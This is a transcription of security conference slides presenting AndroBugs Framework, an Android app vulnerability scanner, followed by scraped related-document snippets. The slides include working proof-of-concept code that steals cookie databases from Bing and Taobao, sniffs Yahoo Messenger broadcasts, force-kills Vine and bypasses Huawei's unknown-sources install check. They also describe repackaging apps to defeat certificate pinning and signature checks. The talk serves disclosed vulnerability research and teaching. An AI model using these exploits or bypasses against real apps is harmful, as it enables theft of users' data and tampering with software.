Android Security Basic Background
|
|
|
- Bathsheba Shelton
- 9 years ago
- Views:
Transcription
1 1
2 Speaker Bio Yu-Cheng Lin ( 林 禹 成 ) Software Engineer at MediaTek smartphone security team M.S. from Information Security Lab of National Tsing Hua University Taiwan [email protected] Website: I am not representing my employer. This research is part of my Master thesis in All the vulnerabilities in these slides have been responsibly disclosed to the developers several months earlier. 2
3 Agenda Android Security Basic Background Introduction to AndroBugs Framework AndroBugs Framework: Design Architecture Security Vulnerabilities and Vulnerability Vectors Implemented in AndroBugs Framework Massive Analysis with AndroBugs Framework Repackaging APK and Hacking with AndroBugs Framework Conclusions 3
4 Android Security Basic Background Every app plays in its sandbox with an unique Linux user and group id If two apps want to share data with each other, they both need to specify the same android:shareduserid in the AndroidManifest.xml and sign with the same certificate. It should not be considered as a security hole in the app if you have physical access to the device (e.g. allow adb backup). Facebook Android App (uid=10021) SQLite DB username Access token contacts Yahoo News Android App (A normal app, uid=10030) Exploit the security vulnerability in Facebook Android 4
5 Why Do I Want To Design This Android App Vulnerability Scanner?
6 The Same Mistakes Are Being Made Again and Again Prior to 2014: ACM CCS 12: The most dangerous code in the world: validating SSL certificates in non-browser software (with POC: Mallodroid) DEFCON 19: Seven Ways to Hang Yourself with Google Android But today? Problem: Not All the Android developers care about security or they just simply forgot about it 6
7 Problems of Current Android Vulnerability Assessment Tool or System Apps must be installed first to check for vulnerabilities Drozer or Xposed Framework Need source code to analyze Paid and expensive Cloud-based system Revenue-oriented Takes some time for you to upload, analyze and get the report (at least 5-10 mins) Massive analysis is not supported Oh NO! We are pen-testers! Complicated installation procedure, needs to install too many 3 rd party libraries with some compatible issues 7
8 Introduction to AndroBugs Framework A system that helps find valid security vulnerabilities in an Android App. Open source and written in Python. A static analysis tool eating Android APK (no source code). Scan for known common coding vulnerabilities Designed for massive analysis and to efficiently finding bugs. You can easily extend new features or vulnerability vectors. 8
9 What Can AndroBugs Framework Do For You? Find security vulnerabilities in an app Check if the code is missing best practices Check dangerous shell commands (e.g. su ) Collect Information from millions of apps Check the app s security protection (for app repackaging hacking) 9
10 AndroBugs Framework Helps You Find Vulnerabilities: Broken WebView configs Checking Cert Signature ContentProvider Vulnerability Which Packer? KeyStore Protection? isdebuggable WebView SSL addjavascriptinterface Using SQLCipher? ADB backup Dangerous shell command MODE_WORLD_READABLE SSL Vulnerability Fragment injection Using Certificate Pinning? Master Key Base64 encoding hack Exported components Implicit Service Sensitive API usages
11 Contribution to Android App Security They all triaged my vulnerability report or list me on their Security Hall of Fame. Some will be introduced later.
12 AndroBugs Framework: Design Architecture
13 AndroGuard: The Decompiler for AndroBugs Framework The original AndroGuard does not have a security vulnerability checking feature. The AndroBugs Framework is based on AndroGuard and I modified the core of AndroGuard a lot. grep -nfr "#Added by AndroBugs" * 13
14 General Techniques for Finding Bugs in AndroBugs Framework Decompile the APK by Androguard Finding Potentially Vulnerable Code, Function Calls (invoke-xxx) or Fields by AndroBugs Framework Depends on the implementations of the vectors Go back to the source function who calls the potential vulnerable function call, analyze related code again to confirm Keypoint: AndroBugs Framework does not try to analyze every line of the code. It only does this when it finds something interesting. 14
15 The Report from AndroBugs Framework Will Give You Vector title Source code paths Severity level (Log Level) Vector Category Detail Explanations (tell you the background knowledge of the vulnerability) Mitigation recommendations Reference research papers or links 15
16 Severity Level Severity Level Critical Warning Notice Info Description Confirmed security vulnerability that should be solved (except for testing code) AndroBugs Framework is not sure if this is a security vulnerability. Developers need to manually confirm. Low priority issue or AndroBugs Framework tries to let you know some additional information. No security issue detected. 16
17 Introduction to New Assistant Engines in AndroBugs Frameweork 1. Static DVM Engine 2. Efficient String Search Engine 3. Filtering Engine 17
18 1. Static DVM Engine The core of AndroBugs Framework. Used by some vulnerability vectors in finding potential security vulnerabilities. Just like DVM or ART in Android OS, the Static DVM Engine runs the Bytecode statically and partially. The Static DVM Engine doesn t need to run the Android App on an Android phone but it knows or tries to predict the application s behavior while it is running. Static DVM Engine runs the code partially. 18
19 Actions for Static DVM Engine Just like Dalvik VM(ART) in Android, the Static DVM Engine maintains a simple register table. Compared to the real DVM/ART on Android OS, some useless instructions(opcode) are removed. opcode Smali bytecode Static DVM action 0x12 <= opcode <= 0x1c 0x0a <= opcode <= 0x0d 0x44 <= opcode <= 0x4a [const] or [const/xx] or [const-string] [move-result vaa] or [move-result-wide vaa] or [move-result-object vaa] or [move-exception vaa] [aget] or [aget-xxxx] or [iget] or [iget-xxxx] or [sget] or [sget-xxxx] Set immediate value to the register table Clear immediate value from the register table Clear immediate value from the register table opcode == 0x6e [invoke-virtual] Add to the invoked method list Android Bytecode Reference: 19
20 Example: Finding WORLD READABLE or WRITABLE Vulnerability Java Code of MODE_WORD_READABLE vulnerability context.getsharedpreferences("sensitive_file", 1); Smali Code of MODE_WORD_READABLE vulnerability const-string v0, "sensitive_file" const/4 v1, 0x1 invoke-virtual {v2, v0, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences; move-result-object v0 # Smali Bytecode Register Table of Static DVM Engine 1 const-string v0, "sensitive_file" v0= sensitive_file 2 3 const/4 v1, 0x1 invoke-virtual {v2, v0, v1}, Landroid/content/Context;- >getsharedpreferences(ljava/lang/string;i)landroid/content/sharedprefere nces; 4 move-result-object v0 v1=0x1 20 v0= sensitive_file v1=0x1 v0= sensitive_file v1=0x1
21 General Techniques for AndroBugs Framework to Find Vulnerability Class A Function A Function B Assume We Want to Trace MODE_WORLD_READABLE context.getsharedpreferences( sensitive_file", 1); Function C const-string v3, xxx" const-string v0, sensitive_file" Keypoint: Find the key function(getsharedpreferences) first, then go back to the start of the function Class B Class C const/4 v1, 0x1 invoke-virtual {v2, v0, v1}, Landroid/content/Context;- >getsharedpreferences(ljava/lang/string;i)landroid/content/sharedpreferences; move-result-object v0 21
22 Decompiled Level of AndroBugs Framework Scanning decompiled Java code by Regular Expression is pretty slow. AndroBugs Framework tries NOT to do this. Android APK Bytecode or Opcode AndroBugs Framework never analyzes decompiled Java code Java Code 22 Why do you need to analyze Java code if you can analyze bytecode (opcode)?
23 Is The Static DVM Engine Really Working? Since The Static DVM Engine is not a real DVM/ART in your Android phone. It does not know, for example, the listing of your root directory: Runtime runtime = Runtime.getRuntime(); Process p = runtime.exec("ls -al /"); But why do you need to know that? Only knowing it tries to run the command ls -al / is enough. Dynamic analysis is good, but it is not a good idea if you want to find vulnerabilities in a huge number of APKs immediately. It is too tiresome and time-consuming to install every APK, run it, and maybe manually test it to reproduce the vulnerability. 23
24 2. Efficient String Search Engine Why was this Engine designed? 1. Searching strings in code using regex matching is quite inefficient and slow. 2. We not only want to find whether the String exists or not, but the Path sources where it is showing up. Hence, I designed a new Efficient String Search Engine that helps search faster. One Search Request Input Match ID Regex or Keyword Text Efficient String Search Engine Output Match ID Complete String found Location or Path 24
25 How does the Efficient String Search Engine work? In Android, Strings are referenced by its index position(offset) in string_id_item[] The Engine compares the string_data_off (string index) in the code In Android bytecode(opcode), Strings are defined by instruction: const-string / const-string-jumbo (opcode=0x1a / 0x1B) Steps: 1. Mapping all strings to ids (string_id_item[] to data) 2. Find strings by user s input and get the ids 3. Search code with opcode instruction 0x1A or 0x1B, and compare the ids in step 2 25
26 3. Filtering Engine Why? Some AD libraries may never fix their vulnerabilities and they are used by many applications. Some libraries are not vulnerable(false positive) or the impact is limited. I am not interested in finding them. We want to bypass some libraries/packages: com.parse com.facebook com.tapjoy 26
27 Security Vulnerabilities and Vulnerability Vectors Implemented in AndroBugs Framework I will give a few concepts and ideas on how vulnerability vectors are implemented
28 Where do the vectors come from? More than eight Android security books Previously published papers and research Slides from security conferences Android Developer Reference Websites Previously published security vulnerabilities My past research experience Some technical blogs and articles 28
29 How A New Vector Is Created In AndroBugs Framework (1/2)? Before Designing A New Vector: Research and find related information about the vulnerability Make a simple POC app to make sure in which platform (Android ICS, JB, KK or L) I can reproduce the vulnerability Consider all the possible cases Example: Which Android SDK API may use the MODE_WORLD_READABLE mode? Decompile the POC app to see the Smali code and think how to add the new vector into AndroBugs Framework 29
30 How A New Vector Is Created In AndroBugs Framework (2/2)? A new vector needs to be tested with at least: An App with vulnerable usage An App with non-vulnerable usage To enhance the accuracy: Many real apps from Google Play should be tested Doing massive analysis to fix the bugs in implementation of vector Design a new vulnerability vector Test it with a vulnerable app and a non-vulnerable app Confirm that the system can verify this vulnerability Do massive scanning Check the report to see if I need to modify the vector s implementation 30 Do massive scanning again
31 Vulnerability Vector Implementations and Vulnerabilities Discovered World Readable & World Writable (Microsoft Office & Baidu) ContentProvider Vulnerability & Directory Traversal (Microsoft Bing) WebView File Access Vulnerability & Exported Components (Alibaba Taobao) SSL Vulnerability (Yahoo Mail) Implicit Broadcast (Yahoo Messenger) Dynamically Registered Unprotected BroadcastReceiver (Twitter Vine) Allow Debuggable (Alibaba Taobao Wireless Charge) All the vulnerabilities were found by Yu-Cheng Lin and have been responsibly disclosed to developers at least several months earlier. 31
32 My SOP to Check the Vulnerabilities Get the APK and analyze it with AndroBugs Framework Get the report from the system If it reports potential security vulnerability, manually decompile the app (e.g. jadx, apktool), do dynamic analysis, and verify if it is a valid vulnerability. Try to make a POC app to reproduce the vulnerability Install the POC app and dynamically verify the vulnerability 32
33 World Readable & World Writable From Google s Android developer website: Creating world-readable files is very dangerous, and likely to cause security holes in applications. It is strongly discouraged; instead, applications should use 33
34 Vector Implementation in AndroBugs Framework 1. First, find all the code that calls (or may use dangerous mode ): openorcreatedatabase getdir getsharedpreferences openfileoutput 2. On finding the function calls, put it into the Static DVM Engine to check the mode (introduced earlier). Report the one with the vulnerable mode : Mode Constant Value MODE_WORLD_READABLE 1 MODE_WORLD_WRITEABLE 2 MODE_WORLD_READABLE + MODE_WORLD_WRITEABLE 3 34
35 Baidu s MODE_WORLD_READABLE Baidu has a push message library that stores the push message Access Token in MODE_WORLD_READABLE Many Baidu Android Apps use the vulnerable Baidu push message library Baidu Books Baidu News Baidu Push Message library Baidu Maps Baidu Music 35
36 Vulnerability in Android NDK: Microsoft Office Mobile (version: ) When you download files from OneDrive on your ICS phone, you are actually leaking those files to attackers. <= Android 4.0.X Too permissive Should explicitly set umask(007); first The DB stores all the paths of user s documents downloaded from OneDrive >= Android 4.1.X Security is improved Downloaded from OneDrive Dynamic analysis is necessary to verify this vulnerability 36
37 ContentProvider Vulnerability & Directory Traversal ContentProvider usually: 1. Directly connects to the SQLite DB in app 2. Provides file access in the app s private data store Android developers sometimes forget to set the default exported settings for ContentProvider This may allow other apps to access sensitive data directly AndroBugs Framework highlights the ContentProvider vulnerability. Setting in AndroidManifest.xml Android OS Running Content Provider Default Exported Value android:targetsdkversion >= 17 API Level >= 17 false android:targetsdkversion >= 17 API Level < 17 true android:targetsdkversion < 17 API Level >= 17 true android:targetsdkversion < 17 API Level < 17 true 37
38 Attack Vector Exported ContentProvider ContentProvider allows other apps to access sensitive data from SQLite DB Vulnerable Exported ContentProvider ContentProvider opens for file reading but does not check input file Vulnerable 38
39 Microsoft Bing Android (version: ) Affected devices: Android 2.X Android 3.X Android 4.0.X Android 4.1.X 39
40 Microsoft Bing Android (version: ) The ContentProvider does not check if the input uri is valid. File is vulnerable to directory traversal. POC String uri = "content://com.microsoft.bing.provider/..%2fdatabases%2fwebviewcookieschromium.db"; Log.i("AndroBugs", "Request stealing Uri: " + uri); InputStream is = context.getcontentresolver().openinputstream(uri.parse(uri)); copy(is, os_dst_file_name); new File( /data/data/com.microsoft.bing/databases%2fwebviewcookieschromium.db ) new File( /data/data/com.microsoft.bing/cache/..%2fdatabases%2fwebviewcookieschromium.db )
41 BTW, Choose A Reliable Java Decompiler This code will not always be executed. It is not correct!
42 WebView File Access Vulnerability & Exported Components Attack Vector Exported Component (Activity) WebView: Allow File Access Vulnerable WebView allows developers to embed a web browser into an application. If "setallowfileaccess in WebSettings is set to true or not set(true by default), it will allow other applications to read its internal files or databases with crafted url "/data/data/[package name]". 42
43 Alibaba Taobao Android (version: 4.2.2) Exported Component: Activity WebView: Allow File Access Vulnerability 43
44 Alibaba Taobao Android (version: 4.2.2) Result: POC Intent intent = new Intent("com.taobao.tao.ReminderActivity"); intent.setclassname("com.taobao.taobao", "com.taobao.tao.reminder.reminderbrowseractivity"); intent.addflags(intent.flag_activity_single_top); intent.putextra("mybrowserurl", "file:///data/data/com.taobao.taobao/databases/webviewco okieschromium.db"); startactivity(intent); 44
45 Implementation of This Vector In AndroBugs Framework How can I check this vulnerability? 1. Find function calls to package name: "Landroid/webkit/WebSettings;" Store all the function calls 2. Check which source class and method names does not include function calls to "setallowfileaccess(z)v" Vulnerable 3. If the WebView sets "setallowfileaccess(boolean)" Put it into the Static DVM Engine and report those that allow file access which are vulnerable 45
46 SSL Vulnerability AndroBugs Framework reports (showed as SSL_Security category): SSL implementation issues in Java code WebView SSL vulnerability SSL Vulnerability Transmitting Sensitive Data Man-In-The- Middle Vulnerable Tools that help you with verify valid SSL vulnerabilities: Fiddler Burp Suite 46
47 Yahoo Mail (100M+ downloads. Version: 4.0.4) Mail Settings My Mail Account Sync Yahoo Contacts The SSL certificate validation is not checked. Leaks all the contacts and Access Token to MITM attackers Gets Access Token that leads Yahoo Mail s account to be compromised Not Vulnerable Vulnerable (allow MITM) 47 Session ID is reusable
48 Unfortunately, When You Login to Yahoo Mail The First Time It will popup and ask if you want to Sync contacts Very User-Friendly
49 Implicit Broadcast Attack Vector: Send broadcast without permission or implicitly The broadcast contains sensitive data Vulnerable 49
50 Yahoo Messenger Android (version: 1.8.6) 50M+ downloads Class: com.yahoo.messenger.android.util.notificationhandler Intent Action for this broadcast Put the sensitive message in Bundle Sending broadcast without receiver permission Yahoo Messenger is using this Notification to notify the user on receiving new message. 50
51 POC <receiver android:name=.sniffbroadcastreceiver" android:exported="true" android:label="sniffbroadcastreceiver" > <intent-filter android:priority="999"> <action android:name="com.yahoo.android.notification.start" /> </intent-filter> </receiver> A malicious app with the highest priority to receive the Yahoo Messenger s broadcast. When somebody sends you a private message, the message is leaking. public class SniffBroadcastReceiver extends BroadcastReceiver public void onreceive(context context, Intent intent) { if ("com.yahoo.android.notification.start".equals(intent.getaction())) { Bundle bundle = intent.getextras(); if (bundle == null) return; Log.i("AndroBugs", "Title=" + bundle.getstring("com.yahoo.android.notification.extra.title", "[empty]")); Log.i("AndroBugs", "Text=" + bundle.getstring("com.yahoo.android.notification.extra.text", "[empty]")); Log.i("AndroBugs", "Ticker=" + bundle.getstring("com.yahoo.android.notification.extra.ticker", "[empty]")); } } } 51
52 Dynamically Registered Unprotected BroadcastReceiver Android developers sometimes forget to protect dynamically registered BroadcastReceiver. They only notice the security protection of statically registered BroadcastReceiver in AndroidManifest.xml Vulnerable App Other Apps Dynamically Registered Unprotected BroadcastReceiver (registerreceiver) Send broadcast to change its original behavior Keypoint: The dynamically registered BroadcastReceiver must do some sensitive things after receiving the broadcast. 52
53 Twitter Vine Android (version: 2.0.3) It registers a BroadcastReceiver in its base Activity. On receiving the co.vine.android.finish broadcast, it will terminate the app (Normally, you cannot force to terminate another app without system privilege). Result: Users cannot always use the Vine App if the "co.vine.android.finish" broadcasts repeatedly. // Class: co.vine.android.baseactionbaractivity private final BroadcastReceiver mfinishreceiver = new BroadcastReceiver() { public void onreceive(context paramanonymouscontext, Intent paramanonymousintent) { if ((paramanonymousintent!= null) && ("co.vine.android.finish".equals(paramanonymousintent.getaction()))) }; } BaseActionBarActivity.this.finish(); 50M+ downloads public void oncreate(bundle parambundle, int paramint, boolean paramboolean1, boolean paramboolean2) {..ṙegisterreceiver(this.mfinishreceiver, "co.vine.android.finish"); Vulnerable Code... } //On running the following code, Vine Android will terminate after 15 secs. Intent i = new Intent("co.vine.android.FINISH"); PendingIntent pi = PendingIntent.getBroadcast(context, 0, i, 0); AlarmManager alarm = (AlarmManager)getSystemService(Context.ALARM_SERVICE); alarm.setrepeating(alarmmanager.rtc_wakeup, System.currentTimeMillis(), 15000, pi); 53 POC
54 The Vulnerability in System App
55 Apps from Unknown Sources Are Not Allow Originally 55
56 Vulnerability in Huawei s System App: PackageInstaller (Version: , CVE ) Proof-Of-Concept: Bypass Unknown Sources Check private void bypasspackageinstallerunknowncheck() { Intent intent = new Intent(); intent.setaction("android.intent.action.install_package"); intent.setdata(uri.fromfile(new File("/mnt/sdcard/Malware.apk")).buildUpon().authority("com.android.packageinstaller").build()); intent.putextra("installdirectly", true); MainActivity.this.startActivity(intent); } HUAWEI P7-L10 (Android 4.4.2) Class: com.android.packageinstaller.packageinstalleractivity 56
57 You Will Never See Install Blocked Again The bug has been responsibly disclosed to Huawei a year ago. 57
58 From The Previous Slides, There Must Be Some Vulnerabilities You Are Very Familiar With
59 Problem: The Same Vulnerabilities Are Being Made Again and Again by AndroBugs Framework
60 Massive Analysis with AndroBugs Framework Hunting Vulnerabilities in Android Application is not hard if you use the right way.
61 Big Data Analyzing with AndroBugs Framework AndroBugs Framework is integrated with MongoDB (NoSQL DB): The analysis result will be stored by Vector ID and Package Name for later analysis. 61
62 How I Do Massive Scanning? Find a target company (e.g. M$) and Download all of their Android Apps (e.g. M$ Offxce Mobile) Run AndroBugs Framework massive analysis tool Find targeting vulnerability by Vector ID and Get the analysis reports from AndroBugs Framework Spend time trying to read Java code (and sometimes smali code), do dynamic analysis, and try to reproduce the vulnerability. Make a POC app to prove it is a valid vulnerability and report it. 62
63 Massive Analysis Tools Provided by AndroBugs Framework 1. python AndroBugs_MassiveAnalysis.py -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input dir] -o [Report output dir] Example: python AndroBugs_MassiveAnalysis.py -b t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports 2. python AndroBugs_ReportSummary.py -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag] Example: python AndroBugs_ReportSummary.py -m massive -b t BlackHat 63
64 Run the Massive Analysis Tool 64 / 93
65 Find Your Targets (Favorite Vector) by ReportSummary Tool 65 / 93
66 Find All the Apps by Your Favorite Vector and Severity Level 3. python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag] Example: python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b t BlackHat Vector: WEBVIEW_RCE addjavascriptinterface The searching speed is optimized 66
67 Alibaba Taobao Wireless Charge Android ( 淘 宝 充 值, Version: 1.1.0) Attack Vector: Find Allow Debuggable in Less Than One Second < Android 4.1 HTC Sensation Enable Debuggable Print Sensitive Information in Logs Vulnerable 67 Also Allow Dynamic Debugging
68 Repackaging APK and Hacking with AndroBugs Framework Not all of the apps are easy to repackage successfully, but it would be easier if you use the right way
69 <Hacker> Category in AndroBugs Framework (Experiment Use) Specifically designed for APK repackaging hackers Vectors in <Hacker> category are NOT vulnerabilities! Scenario: If an app detects itself as not using SSL certificate pinning correctly Its network connection will fail If an app detects its signing certificate is not matched with the predefined one It should become unusable If an app detects itself as not installed from Google Play It should crash itself As you can see there are several ways Android developers will do to protect their applications being hacked 69
70 AndroBugs Framework Helps You Find The Checkpoints Faster and You Can Remove/Modify Their Smali Code AndroBugs Framework gives you the hints to remove the protections
71 <Hacker>Breaking SSL Certificate pinning with AndroBugs Framework Dynamic hooking is also possible to break SSL pinning, but what if we want to make a modified APK? A reverse-engineering hacker would like to put the fake (test) root certificate into the KeyStore in the App and repackage the app to allow for MITM attacks. What they want to know so as to add a fake (test) certificate to test or repackage? Where is the KeyStore password located? Where is the code to load the KeyStore? Where is the KeyStore file located? 71
72 I Love Tesla Motors Android (Version: 2.6. It is using SSL Certificate Pinning) You cannot create a connection with Tesla Motors server under MITM even if you add your own Root Certificate to your device. 72
73 No Connection to the Remote Server under MITM 73 / 93
74 Report of Tesla Motors Android Report from AndroBugs Framework: Which file may store the keystore Class: com.teslamotors.client.teslaclient Where is the password to open the keystore Password to open the keystore
75 Import Your Root Certificate to Tesla Motors KeyStore for Testing Replace the trust.keystore in the APK with the modified one. Sign the APK again. 75
76 Now! Login Again! (Connection is created successfully) This is not a security vulnerability! I just want to make a new Tesla Motors App that is able to MITM! 76
77 Repackage An APK Should Be Better Because If you install a malicious Root Certificate on Andriod 4.4 or newer devices
78 <Hacker>isDebuggable? Scenario: When repackaging an app, hackers may want to see more logs so they enable the debuggable flag. Developers check this flag to see if their APKs are already being hacked. Code used by developers to check debuggable in AndroidManifest.xml: boolean isdebuggable = (0!= (getapplicationinfo().flags & ApplicationInfo.FLAG_DEBUGGABLE)); if (isdebuggable) { //do something else } Goal: Enable the debug mode and pretend as if the debug mode is disabled Repackage a new workable APK 78
79 Vector Implementation in AndroBugs Framework 1. Search the calling field: Landroid/content/pm/ApplicationInfo;->flags:I 2. Get the next instruction of the field 3. Check if the opcode of the next instruction is 0xDD(and-int/lit8) 4. Make sure the register number vxx in "iget" and "and-int/lit8" are the same 5. Make sure the last parameter of instruction "and-int/lit8" is 0x2 Java code of Checking Debuggable boolean isdebuggable = (0!= (getapplicationinfo().flags & ApplicationInfo.FLAG_DEBUGGABLE)); if (isdebuggable) { //do something else } Smali code of Checking Debuggable invoke-virtual {p0}, Lcom/example/androiddebuggable/MainActivity;->getApplicationInfo()Landroid/content/pm/ApplicationInfo; move-result-object v1 iget vxx, v1, Landroid/content/pm/ApplicationInfo;->flags:I and-int/lit8 v1, vxx, 0x2 if-eqz v1, :cond_0 79
80 <Hacker>Breaking App s Signature-based Protection Scenario: If you find the behavior of an app is different (e.g. Unable to login with the correct username and password) after repackaging the app. Keypoint: Some Android developers know that their applications you have repackaged cannot be signed with their own private certificates. 80
81 81 / 93
82 Black Hat USA 2013: How to Build a SpyPhone The truth is Not all the apps are so easy to repackage Some Android developers already know you want to hack or repackage their apps. So they check and compare the signature of the certificate with the predefined one. 82
83 <Hacker>Breaking App s Signature-based Protection Example: In WeChat 5.2 Android, you can find if you repackage the app, you can no longer login to WeChat Android successfully. You must solve the puzzles first so as to login to the repackaged WeChat Android AndroBugs Framework helps you find the signature-based security checkpoints (puzzles) and you may have the directions to remove the protections. 83
84 Tesla Motors Android Compare with the pre-defined signature hash to determine 84
85 <Hacker> Base64 Decoding Hack It s not a security vulnerability. Some developers tend to hide some sensitive Strings with Base64 encoding and they think it is much more secure. AndroBugs Framework tries to decode every Base64-like String for fun. 85
86 Tumblr Android (version: ) Prevent the grep command from getting sensitive Strings directly? 86
87 Innocent Code in WeChat Android (version: ) Please DO NOT hide sensitive Strings in Base64 But PLEASE DO NOT blame on the developers!! Who knows somebody will try to decode every Base64-like String? Base64_encode( fu*k ) ZnVjaw== 87
88 AndroBugs Framework Sometimes Helps You Find Diamonds 88
89 Source Code of AndroBugs Framework
90 But Please Remember If you get the report from AndroBugs Framework, please DO NOT directly copy and paste the report into the security report form: Verify the issue and make the POC first 90
91 Conclusions Not all companies know about mobile security and have the same attitude or standard toward security. You will need to convince them of your idea, so be prepared with a POC. Try to understand or grasp every vulnerability as deep as you can. The most interesting things you ve found may be the most dangerous security holes many developers have made. Same mistakes are made again and again. AndroBugs Framework can help you find those security vulnerabilities faster and easier. 91
92 @AndroBugs 92
WebView addjavascriptinterface Remote Code Execution 23/09/2013
MWR InfoSecurity Advisory WebView addjavascriptinterface Remote Code Execution 23/09/2013 Package Name Date Affected Versions Google Android Webkit WebView 23/09/2013 All Android applications built with
Hacking your Droid ADITYA GUPTA
Hacking your Droid ADITYA GUPTA adityagupta1991 [at] gmail [dot] com facebook[dot]com/aditya1391 Twitter : @adi1391 INTRODUCTION After the recent developments in the smart phones, they are no longer used
Tushar Dalvi Sr. Security Engineer at LinkedIn Penetration Tester. Responsible for securing a large suite mobile apps
Tony Trummer Staff Engineer, Information Security at LinkedIn Penetration tester and mobile security enthusiast #3 in Android Security Acknowledgements Tushar Dalvi Sr. Security Engineer at LinkedIn Penetration
Pentesting Android Apps. Sneha Rajguru (@Sneharajguru)
Pentesting Android Apps Sneha Rajguru (@Sneharajguru) About Me Penetration Tester Web, Mobile and Infrastructure applications, Secure coding ( part time do secure code analysis), CTF challenge writer (at
Mercury User Guide v1.1
Mercury User Guide v1.1 Tyrone Erasmus 2012-09-03 Index Index 1. Introduction... 3 2. Getting started... 4 2.1. Recommended requirements... 4 2.2. Download locations... 4 2.3. Setting it up... 4 2.3.1.
the cross platform mobile apps dream Click to edit Master title style Click to edit Master text styles Third level Fourth level» Fifth level
Click to edit Master title style Click to edit Master text styles The Second nightmare level behind Third level the cross platform Fourth level» Fifth level mobile apps dream Marco Grassi @marcograss [email protected]
APPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK
APPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK John T Lounsbury Vice President Professional Services, Asia Pacific INTEGRALIS Session ID: MBS-W01 Session Classification: Advanced
UNRESTRICTED EXTERNAL
drozer Users Guide mwrinfosecurity.com MWR InfoSecurity UNRESTRICTED EXTERNAL 1 Contents page Change Synopsis... 3 1. Introduction... 4 1.1 What is drozer?... 4 1.2 Conventions... 4 2. Getting Started...
Mobile Security Framework
Automated Mobile Application Security Testing with Mobile Security Framework Ajin Abraham About Me! Security Consultant @ Yodlee! Security Engineering @ IMMUNIO! Next Gen Runtime Application Self Protection
Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert [email protected]
Application Security Testing Erez Metula (CISSP), Founder Application Security Expert [email protected] Agenda The most common security vulnerabilities you should test for Understanding the problems
A qbit on Android Security
A qbit on Android Security Sergey Gorbunov One of the problems with modern desktop operating system is that there is no isolation between applications and the system. As we saw in class, a buggy application
Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
AppUse - Android Pentest Platform Unified
AppUse - Android Pentest Platform Unified Standalone Environment AppUse is designed to be a weaponized environment for Android application penetration testing. It is a unique, free, and rich platform aimed
ANDRA ZAHARIA MARCOM MANAGER
10 Warning Signs that Your Computer is Malware Infected [Updated] ANDRA ZAHARIA MARCOM MANAGER MAY 16TH, 2016 6:05 Malware affects us all The increasing number of Internet users worldwide creates an equal
Security in Android apps
Security in Android apps Falco Peijnenburg (3749002) August 16, 2013 Abstract Apps can be released on the Google Play store through the Google Developer Console. The Google Play store only allows apps
HP AppPulse Mobile. Adding HP AppPulse Mobile to Your Android App
HP AppPulse Mobile Adding HP AppPulse Mobile to Your Android App Document Release Date: April 2015 How to Add HP AppPulse Mobile to Your Android App How to Add HP AppPulse Mobile to Your Android App For
Penetration Testing Android Applications
Author: Kunjan Shah Security Consultant Foundstone Professional Services Table of Contents Penetration Testing Android Applications... 1 Table of Contents... 2 Abstract... 3 Background... 4 Setting up
MASTER'S THESIS. Android Application Security with OWASP Mobile Top 10 2014. James King 2014
MASTER'S THESIS Android Application Security with OWASP Mobile Top 10 2014 James King 2014 Master of Arts (60 credits) Master of Science in Information Security Luleå University of Technology Department
Sascha Fahl, Marian Harbach, Matthew Smith. Usable Security and Privacy Lab Leibniz Universität Hannover
Hunting Down Broken SSL in Android Apps Sascha Fahl, Marian Harbach, Matthew Smith Usable Security and Privacy Lab Leibniz Universität Hannover OWASP AppSec 2013 Seite 1 Appification There s an App for
SAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov
Sergey Belov # whoami Penetration tester @ Digital Security Bug hunter Speaker Agenda SmartTV - what is it? Current state of research (in the world) Samsung Smart TV - series 2008-2014 Emulator vs real
Beginners Guide to Android Reverse Engineering
(W)ORK-SH/OP: Beginners Guide to Android Reverse Engineering (W)ORK-SH/OP: [email protected] Hall[14], Day 3 11:00h Agenda Purpose Recommended or needed tools (De)construction of Android apps Obtaining APKs Decompiling
Popular Android Exploits
20-CS-6053 Network Security Spring, 2016 An Introduction To Popular Android Exploits and what makes them possible April, 2016 Questions Can a benign service call a dangerous service without the user knowing?
Analysis of advanced issues in mobile security in android operating system
Available online atwww.scholarsresearchlibrary.com Archives of Applied Science Research, 2015, 7 (2):34-38 (http://scholarsresearchlibrary.com/archive.html) ISSN 0975-508X CODEN (USA) AASRC9 Analysis of
AGENDA. Background. The Attack Surface. Case Studies. Binary Protections. Bypasses. Conclusions
MOBILE APPLICATIONS AGENDA Background The Attack Surface Case Studies Binary Protections Bypasses Conclusions BACKGROUND Mobile apps for everything == lots of interesting data Banking financial Social
This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.
The hidden risks of mobile applications This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit. To learn more about TraceSecurity visit www.tracesecurity.com
Android Application Repackaging
ISA 564, Laboratory 4 Android Exploitation Software Requirements: 1. Android Studio http://developer.android.com/sdk/index.html 2. Java JDK http://www.oracle.com/technetwork/java/javase/downloads/index.html
Application Intrusion Detection
Application Intrusion Detection Drew Miller Black Hat Consulting Application Intrusion Detection Introduction Mitigating Exposures Monitoring Exposures Response Times Proactive Risk Analysis Summary Introduction
Harvesting Developer Credentials in Android Apps
8 th ACM Conference on Security and Privacy in Wireless and Mobile Networks, New York City, Jun 24-26 Harvesting Developer Credentials in Android Apps Yajin Zhou, Lei Wu, Zhi Wang, Xuxian Jiang Florida
Blackbox Android. Breaking Enterprise Class Applications and Secure Containers. Marc Blanchou Mathew Solnik 10/13/2011. https://www.isecpartners.
Blackbox Android Breaking Enterprise Class Applications and Secure Containers Marc Blanchou Mathew Solnik 10/13/2011 https://www.isecpartners.com Agenda Background Enterprise Class Applications Threats
Mobile security, forensics & malware analysis with Santoku Linux. * Copyright 2013 viaforensics, LLC. Proprietary Information.
